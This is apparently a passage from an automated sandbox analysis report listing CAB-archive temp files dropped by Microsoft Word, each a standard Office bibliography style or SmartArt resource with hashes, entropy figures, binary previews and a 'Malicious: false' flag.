                                                                                                                                                Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CDC.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32833
                                                                                                                                                Entropy (8bit):7.825460303519308
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                                MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                                SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                                SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                                SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CDD.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21875
                                                                                                                                                Entropy (8bit):7.6559132103953305
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                                MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                                SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                                SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                                SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CDE.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):30957
                                                                                                                                                Entropy (8bit):7.808231503692675
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                                MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                                SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                                                SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                                SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CDF.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34816
                                                                                                                                                Entropy (8bit):7.840826397575377
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                                MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                                SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                                SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                                SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CE0.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22340
                                                                                                                                                Entropy (8bit):7.668619892503165
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                                MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                                SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                                SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                                SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CE1.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):35519
                                                                                                                                                Entropy (8bit):7.846686335981972
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                                MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                                SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                                SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                                SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CE2.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26944
                                                                                                                                                Entropy (8bit):7.7574645319832225
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                                MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                                SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                                SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                                SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CE3.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31562
                                                                                                                                                Entropy (8bit):7.81640835713744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                                MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                                SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                                SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                                SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CE4.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33610
                                                                                                                                                Entropy (8bit):7.8340762758330476
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                                MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                                SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                                SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                                SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CE5.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31083
                                                                                                                                                Entropy (8bit):7.814202819173796
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                                MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                                SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                                SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                                SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6D15.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):46413
                                                                                                                                                Entropy (8bit):7.9071408623961394
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                                MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                                SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                                SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                                SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6D16.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):43653
                                                                                                                                                Entropy (8bit):7.899157106666598
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                                MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                                SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                                SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                                SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                                Malicious:false
